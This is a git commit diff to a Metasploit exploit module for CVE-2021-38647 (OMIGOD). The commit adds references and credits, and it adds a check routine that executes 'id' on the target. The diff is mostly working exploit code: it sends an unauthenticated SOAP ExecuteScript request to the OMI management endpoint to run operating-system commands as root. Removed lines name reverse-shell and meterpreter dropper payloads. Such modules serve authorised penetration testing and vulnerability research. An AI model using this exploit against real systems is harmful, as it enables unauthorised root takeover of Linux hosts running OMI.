Update references and add a check method

2021-10-26 10:35:13 -04:00 · 2021-10-26 10:35:13 -04:00 · 33bacd2b20
parent e9582d1ddb
commit 33bacd2b20
1 changed files with 50 additions and 33 deletions
--- a/modules/exploits/linux/misc/cve_2021_38647_omigod.rb
+++ b/modules/exploits/linux/misc/cve_2021_38647_omigod.rb
@ -10,7 +10,6 @@ class MetasploitModule < Msf::Exploit::Remote
  prepend Msf::Exploit::Remote::AutoCheck
  include Msf::Exploit::Remote::HttpClient
  include Msf::Exploit::CmdStager
-  include Msf::Exploit::JavaDeserialization

  XML_NS = { 'p' => 'http://schemas.dmtf.org/wbem/wscim/1/cim-schema/2/SCX_OperatingSystem' }.freeze

@ -20,12 +19,21 @@ class MetasploitModule < Msf::Exploit::Remote
        info,
        'Name' => 'on',
        'Description' => %q{
+          By removing the authentication header, an attacker can issue an HTTP request to the OMI management endpoint
+          that will cause it to execute an operating system command as the root user.
        },
        'Author' => [
-          'Spencer McIntyre',
-          'wvu'
+          'Nir Ohfeld', # vulnerability discovery & research
+          'Shir Tamari', # vulnerability discovery & research
+          'Spencer McIntyre', # metasploit module
+          'wvu' # metasploit module
        ],
        'References' => [
+          %w[CVE 2021-38647],
+          %w[URL https://msrc.microsoft.com/update-guide/vulnerability/CVE-2021-38647],
+          %w[URL https://www.wiz.io/blog/omigod-critical-vulnerabilities-in-omi-azure],
+          %w[URL https://censys.io/blog/understanding-the-impact-of-omigod-cve-2021-38647/],
+          %w[URL https://attackerkb.com/topics/08O94gYdF1/cve-2021-38647]
        ],
        'DisclosureDate' => '2021-09-14',
        'License' => MSF_LICENSE,
@ -38,10 +46,7 @@ class MetasploitModule < Msf::Exploit::Remote
            {
              'Platform' => 'unix',
              'Arch' => ARCH_CMD,
-              'Type' => :unix_cmd,
-              'DefaultOptions' => {
-                'PAYLOAD' => 'cmd/unix/reverse_python_ssl'
-              }
+              'Type' => :unix_cmd
            }
          ],
          [
@ -49,17 +54,15 @@ class MetasploitModule < Msf::Exploit::Remote
            {
              'Platform' => 'linux',
              'Arch' => [ARCH_X86, ARCH_X64],
-              'Type' => :linux_dropper,
-              'DefaultOptions' => {
-                'CMDSTAGER::FLAVOR' => :curl,
-                'PAYLOAD' => 'linux/x64/meterpreter_reverse_https'
-              }
+              'Type' => :linux_dropper
            }
          ]
        ],
        'DefaultTarget' => 1,
        'DefaultOptions' => {
-          'SSL' => true
+          'RPORT' => 5985,
+          'SSL' => false,
+          'MeterpreterTryToFork' => true
        },
        'Notes' => {
          'Stability' => [CRASH_SAFE],
@ -70,14 +73,19 @@ class MetasploitModule < Msf::Exploit::Remote
    )

    register_options([
-      Opt::RPORT(5985),
      OptString.new('TARGETURI', [true, 'Base path', '/wsman'])
    ])
  end

  def check
-    # TODO: write this
-    CheckCode::Vulnerable('hax hax hax')
+    http_res = send_command('id')
+    return CheckCode::Unknown if http_res.nil?
+    return CheckCode::Safe unless http_res.code == 200
+
+    cmd_res = parse_response(http_res)
+    return CheckCode::Unknown if cmd_res.nil? || cmd_res[:stdout] !~ /uid=(\d+)\(\S+\) /
+
+    return CheckCode::Vulnerable("Command executed as uid #{Regexp.last_match(1)}.")
  end

  def exploit
@ -97,8 +105,32 @@ class MetasploitModule < Msf::Exploit::Remote

  def execute_command(cmd, _opts = {})
    vprint_status("Executing command: #{cmd}")
+    res = send_command(cmd)

-    res = send_request_cgi(
+    unless res && res.code == 200
+      fail_with(Failure::UnexpectedReply, "Failed to execute command: #{cmd}")
+    end
+
+    parse_response(res)
+  end
+
+  def parse_response(res)
+    return nil unless res&.code == 200
+
+    return_code = res.get_xml_document.at_xpath('//p:SCX_OperatingSystem_OUTPUT/p:ReturnCode', XML_NS)&.content.to_i
+    unless return_code == 0
+      print_error("Failed to execute command: #{cmd} (status: #{return_code})")
+    end
+
+    {
+      return_code: return_code,
+      stdout: res.get_xml_document.at_xpath('//p:SCX_OperatingSystem_OUTPUT/p:StdOut', XML_NS)&.content,
+      stderr: res.get_xml_document.at_xpath('//p:SCX_OperatingSystem_OUTPUT/p:StdErr', XML_NS)&.content
+    }
+  end
+
+  def send_command(cmd)
+    send_request_cgi(
      'method' => 'POST',
      'uri' => normalize_uri(target_uri.path),
      'ctype' => 'text/xml;charset=UTF-8',
@ -112,7 +144,7 @@ class MetasploitModule < Msf::Exploit::Remote
            </a:ReplyTo>
            <a:Action>http://schemas.dmtf.org/wbem/wscim/1/cim-schema/2/SCX_OperatingSystem/ExecuteScript</a:Action>
            <w:MaxEnvelopeSize s:mustUnderstand="true">102400</w:MaxEnvelopeSize>
-            <a:MessageID>uuid:00B60932-CC01-0005-0000-000000010000</a:MessageID>
+            <a:MessageID>uuid:#{Faker::Internet.uuid}</a:MessageID>
            <w:OperationTimeout>PT1M30S</w:OperationTimeout>
            <w:Locale xml:lang="en-us" s:mustUnderstand="false"/>
            <p:DataLocale xml:lang="en-us" s:mustUnderstand="false"/>
@ -132,20 +164,5 @@ class MetasploitModule < Msf::Exploit::Remote
        </s:Envelope>
      ENVELOPE
    )
-
-    unless res && res.code == 200
-      fail_with(Failure::UnexpectedReply, "Failed to execute command: #{cmd}")
-    end
-
-    return_code = res.get_xml_document.at_xpath('//p:SCX_OperatingSystem_OUTPUT/p:ReturnCode', XML_NS)&.content.to_i
-    unless return_code == 0
-      print_error("Failed to execute command: #{cmd} (status: #{return_code})")
-    end
-
-    {
-      return_code: return_code,
-      stdout: res.get_xml_document.at_xpath('//p:SCX_OperatingSystem_OUTPUT/p:StdOut', XML_NS)&.content,
-      stderr: res.get_xml_document.at_xpath('//p:SCX_OperatingSystem_OUTPUT/p:StdErr', XML_NS)&.content
-    }
  end
 end